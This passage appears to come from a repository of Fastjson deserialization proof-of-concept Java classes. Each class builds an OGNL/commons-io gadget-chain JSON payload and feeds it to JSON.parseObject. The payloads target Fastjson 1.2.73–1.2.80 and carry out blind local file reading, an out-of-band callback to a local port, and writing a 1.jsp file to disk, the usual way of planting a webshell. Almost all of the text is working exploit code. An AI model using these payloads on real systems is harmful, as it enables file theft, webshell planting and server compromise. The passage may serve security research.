 79 |         		+ "				\"node\": {\r\n"
 80 |         		+ "					\"@type\": \"ognl.ASTMethod\",\r\n"
 81 |         		+ "					\"p\": {\r\n"
 82 |         		+ "						\"@type\": \"ognl.OgnlParser\",\r\n"
 83 |         		+ "						\"stream\": {\r\n"
 84 |         		+ "							\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 85 |         		+ "							\"delegate\": {\r\n"
 86 |         		+ "								\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 87 |         		+ "								\"reader\": {\r\n"
 88 |         		+ "									\"@type\": \"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 89 |         		+ "									\"charSequence\": {\r\n"
 90 |         		+ "										\"@type\": \"java.lang.String\" {\r\n"
 91 |         		+ "											\"$ref\": \"$[4].su19\"\r\n"
 92 |         		+ "										},\r\n"
 93 |         		+ "										\"start\": 0,\r\n"
 94 |         		+ "										\"end\": 0\r\n"
 95 |         		+ "									},\r\n"
 96 |         		+ "									\"charsetName\": \"UTF-8\",\r\n"
 97 |         		+ "									\"bufferSize\": 1024\r\n"
 98 |         		+ "								},\r\n"
 99 |         		+ "								\"boms\": [{\r\n"
100 |         		+ "									\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
101 |         		+ "									\"charsetName\": \"UTF-8\",\r\n"
102 |         		+ "									\"bytes\": [1]\r\n"
103 |         		+ "								}]\r\n"
104 |         		+ "							}\r\n"
105 |         		+ "						}\r\n"
106 |         		+ "					}\r\n"
107 |         		+ "				}\r\n"
108 |         		+ "			},{\r\n"
109 |         		+ "			\"su21\": {\r\n"
110 |         		+ "				\"@type\": \"ognl.Evaluation\",\r\n"
111 |         		+ "				\"node\": {\r\n"
112 |         		+ "					\"@type\": \"ognl.ASTMethod\",\r\n"
113 |         		+ "					\"p\": {\r\n"
114 |         		+ "						\"@type\": \"ognl.OgnlParser\",\r\n"
115 |         		+ "						\"stream\": {\r\n"
116 |         		+ "							\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
117 |         		+ "							\"delegate\": {\r\n"
118 |         		+ "								\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
119 |         		+ "								\"reader\": {\r\n"
120 |         		+ "									\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
121 | /*dnslog*/		+ "									\"url\": \"http://127.0.0.1:5667\"\r\n"
122 |         		+ "								},\r\n"
123 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
124 |         		+ "								\"bufferSize\": 1024\r\n"
125 |         		+ "							},\r\n"
126 |         		+ "							\"boms\": [{\r\n"
127 |         		+ "								\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
128 |         		+ "								\"charsetName\": \"UTF-8\",\r\n"
129 |         		+ "								\"bytes\": [\r\n"
130 |         		+ "									49\r\n"
131 |         		+ "								]\r\n"
132 |         		+ "							}]\r\n"
133 |         		+ "						}\r\n"
134 |         		+ "					}\r\n"
135 |         		+ "				}\r\n"
136 |         		+ "			}\r\n"
137 |         		+ "		},\r\n"
138 |         		+ "		{\r\n"
139 |         		+ "			\"su22\": {\r\n"
140 |         		+ "				\"$ref\": \"$[6].su21.node.p.stream\"\r\n"
141 |         		+ "			}\r\n"
142 |         		+ "		},\r\n"
143 |         		+ "		{\r\n"
144 |         		+ "			\"su23\": {\r\n"
145 |         		+ "				\"$ref\": \"$[7].su22.bOM.bytes\"\r\n"
146 |         		+ "			}\r\n"
147 |         		+ "		}]";
148 |    
149 |    
150 |    
151 |         System.out.println(poc1);
152 |         JSON.parseObject(poc1);
153 |        
154 |     }
155 | }
156 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson23_ognl_io_read_print.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import java.io.IOException;
 3 | import java.io.InputStream;
 4 | import java.net.URL;
 5 | import java.util.Arrays;
 6 | import java.util.Base64;
 7 | 
 8 | import com.alibaba.fastjson.JSON;
 9 | 
10 | public class Fastjson23_ognl_io_read_print {
11 |     public static void main(String[] args) throws Exception, IOException{
12 |     	
13 |     	String url = "file:///D:/";
14 |     	InputStream input = new URL(url).openStream();
15 |     	byte[] bs = new byte[input.available()];
16 |     	input.read(bs);
17 |     	String test = Base64.getEncoder().encodeToString(bs);
18 |     	byte[] testbs = test.getBytes();
19 |         System.out.println(Arrays.toString(bs));
20 |         System.out.println(new String(bs));
21 |     	
22 |         //依赖1.2.73-1.2.80 ognl-3.2.21  commons-io-2.2 需回显，根据回显不一样(关注su18/su17字段)布尔读文件
23 |         String poc1 ="{\r\n"
24 |         		+ "	\"su14\": {\r\n"
25 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
26 |         		+ "		\"@type\": \"ognl.OgnlException\"\r\n"
27 |         		+ "	},\r\n"
28 |         		+ "	\"su15\": {\r\n"
29 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
30 |         		+ "		\"val\": {\r\n"
31 |         		+ "			\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
32 |         		+ "			{\r\n"
33 |         		+ "				\"@type\": \"java.lang.String\"\r\n"
34 |         		+ "				\"@type\": \"ognl.OgnlException\",\r\n"
35 |         		+ "				\"_evaluation\": \"\"\r\n"
36 |         		+ "			}\r\n"
37 |         		+ "		},\r\n"
38 |         		+ "		\"su16\": {\r\n"
39 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
40 |         		+ "			\"node\": {\r\n"
41 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
42 |         		+ "				\"p\": {\r\n"
43 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
44 |         		+ "					\"stream\": {\r\n"
45 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
46 |         		+ "						\"delegate\": {\r\n"
47 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
48 |         		+ "							\"reader\": {\r\n"
49 |         		+ "								\"@type\": \"jdk.nashorn.api.scripting.URLReader\",\r\n"
50 |     /*文件位置*/+ "								\"url\": \"file:///D:/\"\r\n"
51 |         		+ "							},\r\n"
52 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
53 |         		+ "							\"bufferSize\": 1024\r\n"
54 |         		+ "						},\r\n"
55 |         		+ "						\"boms\": [{\r\n"
56 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
57 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
58 |         		+ "							\"bytes\": [\r\n"
59 |    /*文件bytes*/	+ "								36,82\r\n"
60 |         		+ "							]\r\n"
61 |         		+ "						}]\r\n"
62 |         		+ "					}\r\n"
63 |         		+ "				}\r\n"
64 |         		+ "			}\r\n"
65 |         		+ "		},\r\n"
66 |         		+ "		\"su17\": {\r\n"
67 |         		+ "			\"$ref\": \"$.su16.node.p.stream\"\r\n"
68 |         		+ "		},\r\n"
69 |         		+ "		\"su18\": {\r\n"
70 |         		+ "			\"$ref\": \"$.su17.bOM.bytes\"\r\n"
71 |         		+ "		}\r\n"
72 |         		+ "	}";
73 |    
74 |    
75 |         System.out.println(poc1);
76 |         System.out.println(JSON.parseObject(poc1));
77 | 
78 |        
79 |     }
80 | }
81 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson24_ognl_io_write_1.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | 
  6 | public class Fastjson24_ognl_io_write_1 {
  7 |     public static void main(String[] args) throws Exception {
  8 |         //依赖1.2.73-1.2.80 ognl-3.2.21  commons-io-2.0-2.6
  9 |     	String code = "test";
 10 |         for (int i = 0; i < 8200; i++) {
 11 | 			code += "a";
 12 | 		}
 13 |         String poc2 = "    \r\n"
 14 |         		+ "    {\r\n"
 15 |         		+ "	\"su14\": {\r\n"
 16 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 17 |         		+ "		\"@type\": \"ognl.OgnlException\"\r\n"
 18 |         		+ "	},\r\n"
 19 |         		+ "	\"su15\": {\r\n"
 20 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 21 |         		+ "		\"val\": {\r\n"
 22 |         		+ "			\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 23 |         		+ "			{\r\n"
 24 |         		+ "				\"@type\": \"java.lang.String\"\r\n"
 25 |         		+ "				\"@type\": \"ognl.OgnlException\",\r\n"
 26 |         		+ "				\"_evaluation\": \"\"\r\n"
 27 |         		+ "			}\r\n"
 28 |         		+ "		},\r\n"
 29 |         		+ "		\"su16\": {\r\n"
 30 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
 31 |         		+ "			\"node\": {\r\n"
 32 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
 33 |         		+ "				\"p\": {\r\n"
 34 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
 35 |         		+ "					\"stream\": {\r\n"
 36 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 37 |         		+ "						\"delegate\": {\r\n"
 38 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 39 |         		+ "							\"reader\": {\r\n"
 40 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 41 |         		+ "      \"is\":{\r\n"
 42 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
 43 |         		+ "        \"input\":{\r\n"
 44 |         		+ "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 45 |         		+ "      \"reader\":{\r\n"
 46 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 47 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
 48 |         		+ "      },\r\n"
 49 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 50 |         		+ "      \"bufferSize\":1024\r\n"
 51 |         		+ "    },\r\n"
 52 |         		+ "            \"branch\":{\r\n"
 53 |         		+ "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
 54 |         		+ "      \"writer\":{\r\n"
 55 |         		+ "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
 56 |         		+ "        \"file\":\"1.jsp\",\r\n"
 57 |         		+ "        \"encoding\":\"UTF-8\",\r\n"
 58 |         		+ "        \"append\": false\r\n"
 59 |         		+ "      },\r\n"
 60 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 61 |         		+ "      \"bufferSize\": 1024,\r\n"
 62 |         		+ "      \"writeImmediately\": true\r\n"
 63 |         		+ "    },\r\n"
 64 |         		+ "        \"closeBranch\": true\r\n"
 65 |         		+ "      },\r\n"
 66 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
 67 |         		+ "      \"lenient\":false,\r\n"
 68 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
 69 |         		+ "    },\r\n"
 70 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 71 |         		+ "							\"bufferSize\": 1024\r\n"
 72 |         		+ "						},\r\n"
 73 |         		+ "						\"boms\": [{\r\n"
 74 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 75 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 76 |         		+ "							\"bytes\": [\r\n"
 77 |         		+ "								36,82\r\n"
 78 |         		+ "							]\r\n"
 79 |         		+ "						}]\r\n"
 80 |         		+ "					}\r\n"
 81 |         		+ "				}\r\n"
 82 |         		+ "			}\r\n"
 83 |         		+ "		},\r\n"
 84 |         		+ "		\"su17\": {\r\n"
 85 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
 86 |         		+ "			\"node\": {\r\n"
 87 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
 88 |         		+ "				\"p\": {\r\n"
 89 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
 90 |         		+ "					\"stream\": {\r\n"
 91 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 92 |         		+ "						\"delegate\": {\r\n"
 93 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 94 |         		+ "							\"reader\": {\r\n"
 95 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 96 |         		+ "      \"is\":{\r\n"
 97 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
 98 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
 99 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
100 |         		+ "        \"closeBranch\": true\r\n"
101 |         		+ "      },\r\n"
102 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
103 |         		+ "      \"lenient\":false,\r\n"
104 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
105 |         		+ "    },\r\n"
106 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
107 |         		+ "							\"bufferSize\": 1024\r\n"
108 |         		+ "						},\r\n"
109 |         		+ "						\"boms\": [{\r\n"
110 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
111 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
112 |         		+ "							\"bytes\": [\r\n"
113 |         		+ "								36,82\r\n"
114 |         		+ "							]\r\n"
115 |         		+ "						}]\r\n"
116 |         		+ "					}\r\n"
117 |         		+ "				}\r\n"
118 |         		+ "			}\r\n"
119 |         		+ "		},\r\n"
120 |         		+ "		\"su18\": {\r\n"
121 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
122 |         		+ "			\"node\": {\r\n"
123 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
124 |         		+ "				\"p\": {\r\n"
125 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
126 |         		+ "					\"stream\": {\r\n"
127 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
128 |         		+ "						\"delegate\": {\r\n"
129 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
130 |         		+ "							\"reader\": {\r\n"
131 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
132 |         		+ "      \"is\":{\r\n"
133 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
134 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
135 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
136 |         		+ "        \"closeBranch\": true\r\n"
137 |         		+ "      },\r\n"
138 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
139 |         		+ "      \"lenient\":false,\r\n"
140 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
141 |         		+ "    },\r\n"
142 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
143 |         		+ "							\"bufferSize\": 1024\r\n"
144 |         		+ "						},\r\n"
145 |         		+ "						\"boms\": [{\r\n"
146 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
147 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
148 |         		+ "							\"bytes\": [\r\n"
149 |         		+ "								36,82\r\n"
150 |         		+ "							]\r\n"
151 |         		+ "						}]\r\n"
152 |         		+ "					}\r\n"
153 |         		+ "				}\r\n"
154 |         		+ "			}\r\n"
155 |         		+ "		},\r\n"
156 |         		+ "		\"su19\": {\r\n"
157 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
158 |         		+ "			\"node\": {\r\n"
159 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
160 |         		+ "				\"p\": {\r\n"
161 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
162 |         		+ "					\"stream\": {\r\n"
163 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
164 |         		+ "						\"delegate\": {\r\n"
165 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
166 |         		+ "							\"reader\": {\r\n"
167 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
168 |         		+ "      \"is\":{\r\n"
169 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
170 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.input\"},\r\n"
171 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.is.branch\"},\r\n"
172 |         		+ "        \"closeBranch\": true\r\n"
173 |         		+ "      },\r\n"
174 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
175 |         		+ "      \"lenient\":false,\r\n"
176 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
177 |         		+ "    },\r\n"
178 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
179 |         		+ "							\"bufferSize\": 1024\r\n"
180 |         		+ "						},\r\n"
181 |         		+ "						\"boms\": [{\r\n"
182 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
183 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
184 |         		+ "							\"bytes\": [\r\n"
185 |         		+ "								36,82\r\n"
186 |         		+ "							]\r\n"
187 |         		+ "						}]\r\n"
188 |         		+ "					}\r\n"
189 |         		+ "				}\r\n"
190 |         		+ "			}\r\n"
191 |         		+ "		},	\r\n"
192 |         		+ "	}\r\n"
193 |         		+ "";
194 |         System.out.println(poc2);
195 | 
196 |         JSON.parseObject(poc2);
197 |     }
198 | }
199 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson25_ognl_io_write_2.java:
--------------------------------------------------------------------------------
  1 | package com.shiro.vuln.fastjson;
  2 | 
  3 | import com.alibaba.fastjson.JSON;
  4 | 
  5 | 
  6 | public class Fastjson25_ognl_io_write_2 {
  7 |     public static void main(String[] args) throws Exception {
  8 |         //依赖1.2.73-1.2.80 ognl-3.2.21  commons-io-2.7/2.8
  9 |     	String code = "test";
 10 |         for (int i = 0; i < 8200; i++) {
 11 | 			code += "a";
 12 | 		}
 13 |         String poc1 = "    \r\n"
 14 |         		+ "    {\r\n"
 15 |         		+ "	\"su14\": {\r\n"
 16 |         		+ "		\"@type\": \"java.lang.Exception\",\r\n"
 17 |         		+ "		\"@type\": \"ognl.OgnlException\"\r\n"
 18 |         		+ "	},\r\n"
 19 |         		+ "	\"su15\": {\r\n"
 20 |         		+ "		\"@type\": \"java.lang.Class\",\r\n"
 21 |         		+ "		\"val\": {\r\n"
 22 |         		+ "			\"@type\": \"com.alibaba.fastjson.JSONObject\",\r\n"
 23 |         		+ "			{\r\n"
 24 |         		+ "				\"@type\": \"java.lang.String\"\r\n"
 25 |         		+ "				\"@type\": \"ognl.OgnlException\",\r\n"
 26 |         		+ "				\"_evaluation\": \"\"\r\n"
 27 |         		+ "			}\r\n"
 28 |         		+ "		},\r\n"
 29 |         		+ "		\"su16\": {\r\n"
 30 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
 31 |         		+ "			\"node\": {\r\n"
 32 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
 33 |         		+ "				\"p\": {\r\n"
 34 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
 35 |         		+ "					\"stream\": {\r\n"
 36 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 37 |         		+ "						\"delegate\": {\r\n"
 38 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 39 |         		+ "							\"reader\": {\r\n"
 40 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 41 |         		+ "      \"inputStream\":{\r\n"
 42 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
 43 |         		+ "        \"input\":{\r\n"
 44 |         		+ "      \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 45 |         		+ "      \"reader\":{\r\n"
 46 |         		+ "        \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
 47 |         		+ "        \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\",\r\n"
 48 |         		+ "        \"start\":0,\r\n"
 49 |         		+ "        \"end\":2147483647\r\n"
 50 |         		+ "      },\r\n"
 51 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 52 |         		+ "      \"bufferSize\":1024\r\n"
 53 |         		+ "    },\r\n"
 54 |         		+ "            \"branch\":{\r\n"
 55 |         		+ "      \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
 56 |         		+ "      \"writer\":{\r\n"
 57 |         		+ "        \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
 58 |         		+ "        \"file\":\"1.jsp\",\r\n"
 59 |         		+ "        \"charsetName\":\"UTF-8\",\r\n"
 60 |         		+ "        \"append\": false\r\n"
 61 |         		+ "      },\r\n"
 62 |         		+ "      \"charsetName\":\"UTF-8\",\r\n"
 63 |         		+ "      \"bufferSize\": 1024,\r\n"
 64 |         		+ "      \"writeImmediately\": true\r\n"
 65 |         		+ "    },\r\n"
 66 |         		+ "        \"closeBranch\": true\r\n"
 67 |         		+ "      },\r\n"
 68 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
 69 |         		+ "      \"lenient\":false,\r\n"
 70 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
 71 |         		+ "    },\r\n"
 72 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 73 |         		+ "							\"bufferSize\": 1024\r\n"
 74 |         		+ "						},\r\n"
 75 |         		+ "						\"boms\": [{\r\n"
 76 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
 77 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
 78 |         		+ "							\"bytes\": [\r\n"
 79 |         		+ "								36,82\r\n"
 80 |         		+ "							]\r\n"
 81 |         		+ "						}]\r\n"
 82 |         		+ "					}\r\n"
 83 |         		+ "				}\r\n"
 84 |         		+ "			}\r\n"
 85 |         		+ "		},\r\n"
 86 |         		+ "		\"su17\": {\r\n"
 87 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
 88 |         		+ "			\"node\": {\r\n"
 89 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
 90 |         		+ "				\"p\": {\r\n"
 91 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
 92 |         		+ "					\"stream\": {\r\n"
 93 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
 94 |         		+ "						\"delegate\": {\r\n"
 95 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
 96 |         		+ "							\"reader\": {\r\n"
 97 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
 98 |         		+ "      \"inputStream\":{\r\n"
 99 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
100 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
101 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
102 |         		+ "        \"closeBranch\": true\r\n"
103 |         		+ "      },\r\n"
104 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
105 |         		+ "      \"lenient\":false,\r\n"
106 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
107 |         		+ "    },\r\n"
108 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
109 |         		+ "							\"bufferSize\": 1024\r\n"
110 |         		+ "						},\r\n"
111 |         		+ "						\"boms\": [{\r\n"
112 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
113 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
114 |         		+ "							\"bytes\": [\r\n"
115 |         		+ "								36,82\r\n"
116 |         		+ "							]\r\n"
117 |         		+ "						}]\r\n"
118 |         		+ "					}\r\n"
119 |         		+ "				}\r\n"
120 |         		+ "			}\r\n"
121 |         		+ "		},\r\n"
122 |         		+ "		\"su18\": {\r\n"
123 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
124 |         		+ "			\"node\": {\r\n"
125 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
126 |         		+ "				\"p\": {\r\n"
127 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
128 |         		+ "					\"stream\": {\r\n"
129 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
130 |         		+ "						\"delegate\": {\r\n"
131 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
132 |         		+ "							\"reader\": {\r\n"
133 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
134 |         		+ "      \"inputStream\":{\r\n"
135 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
136 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
137 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
138 |         		+ "        \"closeBranch\": true\r\n"
139 |         		+ "      },\r\n"
140 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
141 |         		+ "      \"lenient\":false,\r\n"
142 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
143 |         		+ "    },\r\n"
144 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
145 |         		+ "							\"bufferSize\": 1024\r\n"
146 |         		+ "						},\r\n"
147 |         		+ "						\"boms\": [{\r\n"
148 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
149 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
150 |         		+ "							\"bytes\": [\r\n"
151 |         		+ "								36,82\r\n"
152 |         		+ "							]\r\n"
153 |         		+ "						}]\r\n"
154 |         		+ "					}\r\n"
155 |         		+ "				}\r\n"
156 |         		+ "			}\r\n"
157 |         		+ "		},\r\n"
158 |         		+ "		\"su19\": {\r\n"
159 |         		+ "			\"@type\": \"ognl.Evaluation\",\r\n"
160 |         		+ "			\"node\": {\r\n"
161 |         		+ "				\"@type\": \"ognl.ASTMethod\",\r\n"
162 |         		+ "				\"p\": {\r\n"
163 |         		+ "					\"@type\": \"ognl.OgnlParser\",\r\n"
164 |         		+ "					\"stream\": {\r\n"
165 |         		+ "						\"@type\": \"org.apache.commons.io.input.BOMInputStream\",\r\n"
166 |         		+ "						\"delegate\": {\r\n"
167 |         		+ "							\"@type\": \"org.apache.commons.io.input.ReaderInputStream\",\r\n"
168 |         		+ "							\"reader\": {\r\n"
169 |         		+ "      \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
170 |         		+ "      \"inputStream\":{\r\n"
171 |         		+ "        \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
172 |         		+ "        \"input\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.input\"},\r\n"
173 |         		+ "        \"branch\":{\"$ref\": \"$.su16.node.p.stream.delegate.reader.inputStream.branch\"},\r\n"
174 |         		+ "        \"closeBranch\": true\r\n"
175 |         		+ "      },\r\n"
176 |         		+ "      \"httpContentType\":\"text/xml\",\r\n"
177 |         		+ "      \"lenient\":false,\r\n"
178 |         		+ "      \"defaultEncoding\":\"UTF-8\"\r\n"
179 |         		+ "    },\r\n"
180 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
181 |         		+ "							\"bufferSize\": 1024\r\n"
182 |         		+ "						},\r\n"
183 |         		+ "						\"boms\": [{\r\n"
184 |         		+ "							\"@type\": \"org.apache.commons.io.ByteOrderMark\",\r\n"
185 |         		+ "							\"charsetName\": \"UTF-8\",\r\n"
186 |         		+ "							\"bytes\": [\r\n"
187 |         		+ "								36,82\r\n"
188 |         		+ "							]\r\n"
189 |         		+ "						}]\r\n"
190 |         		+ "					}\r\n"
191 |         		+ "				}\r\n"
192 |         		+ "			}\r\n"
193 |         		+ "		}	\r\n"
194 |         		+ "	}\r\n"
195 |         		+ "";
196 |         System.out.println(poc1);
197 | 
198 |         JSON.parseObject(poc1);
199 |     }
200 | }
201 | 


--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson26_ognl_io_write_4.java:
--------------------------------------------------------------------------------
 1 | package com.shiro.vuln.fastjson;
 2 | import java.io.InputStream;
 3 | import java.net.URL;
 4 | import java.util.Arrays;
 5 | import java.util.Base64;
 6 | 
 7 | import com.alibaba.fastjson.JSON;
 8 | import com.alibaba.fastjson.parser.ParserConfig;
 9 | 
10 | 
11 | public class Fastjson26_ognl_io_write_4 {
12 |     public static void main(String[] args) throws Exception {
13 |     	String url = "file:///D:/Downloads/1.txt";
14 |     	InputStream input = new URL(url).openStream();
15 |     	byte[] bs = new byte[input.available()];
16 |     	input.read(bs);
17 |     	String test = Base64.getEncoder().encodeToString(bs);
18 |     	byte[] testbs = test.getBytes();
19 |     	
20 |     	//1.2.73-1.2.80 ognl-3.2.21 commons-io-2.2 aspectjtools-1.9.6 commons-codec-1.6
21 |     	//这条链主要是为了解决1-3的io链无法写入复杂文件结构，文件依旧需要大于8kb才能写入
22 |     	
